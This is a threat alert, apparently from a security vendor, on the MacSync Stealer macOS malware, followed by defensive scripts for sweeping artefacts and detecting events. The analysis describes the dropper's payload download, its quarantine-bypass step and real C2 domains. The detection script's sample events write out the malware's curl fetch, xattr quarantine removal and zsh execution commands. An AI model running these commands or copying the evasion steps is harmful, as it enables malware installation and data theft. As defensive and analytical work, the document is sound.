MacSync Stealer Malware

Jamf Threat Labs has identified a significant evolution in the deployment tactics of the MacSync Stealer malware. Previously reliant on social engineering techniques such as "ClickFix" or "drag-to-terminal" instructions, threat actors have shifted towards a more sophisticated approach. The malware is now being distributed as a code-signed Swift application, significantly increasing its ability to bypass standard macOS security controls.

Threat alert
December 29, 2025

This campaign utilises a deceptive disk image, masquerading as a legitimate installer (zk-call-messenger-installer-3.9.2-lts.dmg), to deliver a dropper that silently retrieves and executes a second-stage payload without requiring direct user interaction with the terminal.

Delivery Mechanism:

The malware is delivered via a disk image (DMG) named zk-call-messenger-installer-3.9.2-lts.dmg. To evade detection and inflate the file size (approx. 25.5MB), the disk image contains decoy PDF files related to LibreOffice.

Code Signing:

The malicious binary was signed and notarised using the Apple Developer Team ID GNJLS3UYZ4, which has since been revoked following reports to Apple.

Execution Flow:

  • Initialisation: Upon execution, the Swift-based dropper (runtimectl) establishes persistence directories at ~/Library/Application Support/UserSyncWorker/ and creates a log file at ~/Library/Logs/UserSyncWorker.log.
  • Environment Checks: It performs checks for internet connectivity and enforces a rate limit, ensuring it does not run more than once every 3600 seconds.
  • Payload Retrieval: If conditions are met, it fetches an obfuscated script from https://gatemaden.space using curl. The threat actors utilise specific flags (-fL, -sS, --noproxy) and a custom user agent (UserSyncWorker/1.0 (macOS)) to evade network-based detection.
  • Evasion & Execution: The dropper removes the com.apple.quarantine attribute from the downloaded payload (/tmp/runner), sets executable permissions, and validates that the file is a zsh script.
  • Final Stage: The script is executed, connecting to the C2 domain focusgroovy.com to exfiltrate data.

Mitigations:

Indicator Sweeping: Scan endpoints for the presence of the following filesystem artefacts:

  • ~/Library/Logs/UserSyncWorker.log
  • ~/Library/Application Support/UserSyncWorker/
  • /tmp/runner (though this is deleted after execution)
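
The sweep above, written out as a POSIX sh script a Mac admin could run from an endpoint-management tool. This is an added example, not Jamf's tooling: the artefact paths are the ones listed in this alert, while the HOME_DIR and TMP_DIR parameters are an assumption made so the check can be pointed at any user profile (or a test directory) rather than only the caller's own home.

```shell
#!/bin/sh
# Added example (not Jamf's tooling): sweep for the MacSync Stealer
# filesystem artefacts named in the alert. The artefact paths come from
# the alert; HOME_DIR and TMP_DIR are assumed parameters so the function
# can be run against any profile or a test directory.

# sweep_macsync_artefacts HOME_DIR [TMP_DIR]
# Prints one FOUND line per artefact present; the exit status is the
# number of artefacts found, so 0 means the profile looks clean.
sweep_macsync_artefacts() {
    home="$1"
    tmp="${2:-/tmp}"
    found=0
    # /tmp/runner is deleted after execution, so its absence proves nothing;
    # the log file and the support directory are the durable indicators.
    for path in \
        "$home/Library/Logs/UserSyncWorker.log" \
        "$home/Library/Application Support/UserSyncWorker" \
        "$tmp/runner"; do
        if [ -e "$path" ]; then
            printf 'FOUND: %s\n' "$path"
            found=$((found + 1))
        fi
    done
    return "$found"
}

# sweep_all_users [USERS_DIR] [TMP_DIR]
# Runs the sweep over every profile under /Users (or USERS_DIR) and prints
# a one-line total suitable for an inventory or extension-attribute result.
sweep_all_users() {
    users_dir="${1:-/Users}"
    tmp="${2:-/tmp}"
    total=0
    for profile in "$users_dir"/*; do
        [ -d "$profile" ] || continue
        sweep_macsync_artefacts "$profile" "$tmp" || total=$((total + $?))
    done
    printf 'MacSync artefacts found: %d\n' "$total"
    return "$total"
}

# Stand-alone use: `sh sweep.sh --run` sweeps every profile on this Mac.
if [ "${1:-}" = "--run" ]; then
    sweep_all_users
fi
```

Because the function reports through its exit status, it composes with `if` in a larger remediation script; treat any non-zero result as a confirmed indicator and escalate rather than simply deleting the files, since the log may show when and how often the dropper ran.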

Revocation Checks: Ensure macOS devices are online to receive the latest certificate revocation lists (CRLs) from Apple, which will invalidate the compromised Team ID GNJLS3UYZ4.

Recommendations:

Endpoint Detection and Response (EDR): Deploy and configure EDR solutions to monitor for unusual process execution chains, particularly signed applications spawning shells (zsh/bash) or using curl with unusual flags or user agents.

User Awareness Training: Educate users that code signing and notarisation do not guarantee software safety. Users should be wary of applications asking them to override security settings or those downloaded from unofficial sources.

Behavioural Monitoring: Monitor for applications that attempt to modify file attributes or those creating hidden directories in the user's Library folder.
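
The EDR and behavioural-monitoring recommendations above, turned into concrete detection logic run over a few process-creation events. This is an added example, not Jamf's code or any vendor's rule set: the pipe-separated event format (timestamp, parent, whether the parent is signed, child, command line) and the sample events are constructed for the example, the installer volume path and example.invalid URLs are placeholders, and the allowlist of Apple platform-binary parents is a simplifying assumption.

```shell
#!/bin/sh
# Added example (not Jamf's code): apply the alert's detection ideas to a
# stream of process-creation events. The event format is constructed for
# this example (timestamp|parent|parent_signed|child|command line); real
# EDR exports differ, so the field mapping is an assumption.

# sample_events: constructed events, not real telemetry. The installer
# volume path and the example.invalid URLs are placeholders.
sample_events() {
cat <<'EOF'
2025-12-29T10:14:58Z|/Applications/Safari.app/Contents/MacOS/Safari|yes|/usr/bin/curl|curl -fL https://example.invalid/update.json
2025-12-29T10:15:02Z|/Volumes/Installer/runtimectl|yes|/usr/bin/curl|curl -fL -sS --noproxy * -A UserSyncWorker/1.0 (macOS) https://example.invalid/payload
2025-12-29T10:15:03Z|/Volumes/Installer/runtimectl|yes|/usr/bin/xattr|xattr -d com.apple.quarantine /tmp/runner
2025-12-29T10:15:04Z|/Volumes/Installer/runtimectl|yes|/bin/zsh|/bin/zsh /tmp/runner
2025-12-29T10:16:10Z|/usr/bin/login|yes|/bin/zsh|-zsh
EOF
}

# flag_suspicious_events: reads events on stdin and prints one ALERT line
# per event that matches a rule drawn from the alert's recommendations.
flag_suspicious_events() {
    awk -F '|' '
    {
        ts = $1; parent = $2; signed = $3; child = $4; cmd = $5
        n = split(child, parts, "/"); base = parts[n]
        # Crude allowlist (an assumption): shells spawned by Apple platform
        # binaries such as login are routine and must not alert.
        platform = (parent ~ /^\/(System|usr|bin|sbin)\//)
        reason = ""
        if (base == "curl" && (cmd ~ /--noproxy/ || cmd ~ /UserSyncWorker\/1\.0/))
            reason = "curl with --noproxy or the UserSyncWorker user agent"
        else if (base == "xattr" && cmd ~ /(^| )-d( |$)/ && cmd ~ /com\.apple\.quarantine/)
            reason = "quarantine attribute removed from a file"
        else if (signed == "yes" && !platform && (base == "zsh" || base == "bash" || base == "sh"))
            reason = "signed application spawning a shell"
        if (reason != "")
            printf "ALERT %s parent=%s child=%s reason=%s\n", ts, parent, child, reason
    }'
}

# Stand-alone run over the constructed sample: `sh detect.sh --demo`
if [ "${1:-}" = "--demo" ]; then
    sample_events | flag_suspicious_events
fi
```

Run against the sample, the three runtimectl events alert (curl with the dropper's flags and user agent, the quarantine-attribute removal, and the signed parent spawning zsh), while Safari's ordinary curl and login's zsh do not. The shell-spawn rule is the noisiest of the three in practice, which is why it carries an allowlist; the user-agent and quarantine rules are specific enough to stand on their own.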